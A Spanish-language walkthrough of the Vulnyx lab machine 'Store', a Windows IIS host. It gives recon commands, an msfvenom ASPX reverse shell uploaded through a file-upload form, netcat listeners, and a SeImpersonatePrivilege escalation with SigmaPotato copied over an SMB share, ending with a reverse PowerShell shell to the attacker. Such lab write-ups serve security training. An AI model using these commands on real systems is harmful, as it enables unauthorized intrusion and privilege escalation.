Máquina Store (Vulnyx)

Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.52
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:

$ ping -c 1 10.0.2.52


Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn -p- 10.0.2.52 -sVC


Como podemos comprobar la Máquina Victima tiene abiertos los puertos 80, 135, 139, 445, 5985, 47001, 49664, 49665, 49666, 49667, 49668, 49669 y 49670.

Comprobamos que es lo que corre por el puerto 80.


A continuación, realizamos con la herramienta gobuster un fuzzing web, para ello ejecutamos el siguiente comando:

$ gobuster dir -u http://10.0.2.52 -w /usr/share/seclists/Discovery/Web-Content/Web-Servers/IIS.txt


Encontramos el directorio aspnet_files.

Accedemos a el.


Nos encontramos con una subida de ficheros.

A continuación, realizamos con la herramienta gobuster un fuzzing web, para ello ejecutamos el siguiente comando:

$ gobuster dir -u http://10.0.2.52/aspnet_files -w /usr/share/seclists/Discovery/Web-Content/common.txt


Encontramos el directorio uploads.

Con la ayuda de la herramienta netexec comprobamos la arquitectura del Sistema Operativo de la Máquina Victima, para ello ejecutamos el siguiente comando:

$ netexec smb 10.0.2.52

Con la ayuda de la herramienta msfvenom nos creamos una reverse shell ASPX, para ello ejecutamos el siguiente comando:

$ msfvenom -p windows/x64/shell_reverse_tcp --platform windows --arch x64 LHOST=10.0.2.4 LPORT=443 -f aspx -o reverse.aspx

Una vez creada la reverse shell, la subimos.

En nuestra terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat (nc) nos ponemos a la escucha por el puerto 443 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:

$ nc -lvnp 443

Ejecutamos el exploit de la siguiente manera:


Obtenemos una shell.

Identificamos la versión del Sistema Operativo, para ello ejecutamos el siguiente comando:

c:> systeminfo

A continuación, identificamos el usuario y los privilegios, para ello ejecutamos el siguiente comando:

c:> whoami /all

Como podemos ver somos el usuario iis apppool, y tenemos el privilegio SeImpersonatePrivilege activado, siendo este un privilegio de Windows que otorga a un usuario o proceso la capacidad de suplantar el contexto de seguridad de otro usuario o cuenta, por lo tanto, nos descargamos la herramienta SigmaPotato para explotar este privilegio.

Nos pasamos el ejecutable a la Máquina Victima a través del protocolo SMB (445) con la ayuda de la herramienta impacket-smbserver, para ello desde nuestra Máquina Atacante en el directorio donde se encuentra descargada la herramienta ejecutamos el siguiente comando:

$ impacket-smbserver share $(pwd) -smb2support

En la Máquina Victima nos descargamos la herramienta, para ello ejecutamos el siguiente comando:

c:\Windows\Temp> copy \\10.0.2.4\share\SigmaPotato.exe

A continuación, en nuestra terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat (nc) nos ponemos a la escucha por el puerto 4444 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:

$ nc -lvnp 4444

Ejecutamos la herramienta en la Máquina Victima para establecer una shell inversa de PowerShell, para ello ejecutamos el siguiente comando:

c:\Windows\Temp> .\SigmaPotato.exe --revshell 10.0.2.4 4444